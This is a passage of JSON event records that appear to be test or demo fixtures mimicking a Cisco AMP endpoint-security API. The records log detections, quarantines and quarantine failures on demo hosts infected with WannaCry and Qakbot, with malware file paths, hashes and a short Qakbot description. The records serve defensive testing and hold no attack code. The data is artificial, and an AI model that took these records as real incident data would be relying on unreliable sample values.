found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective 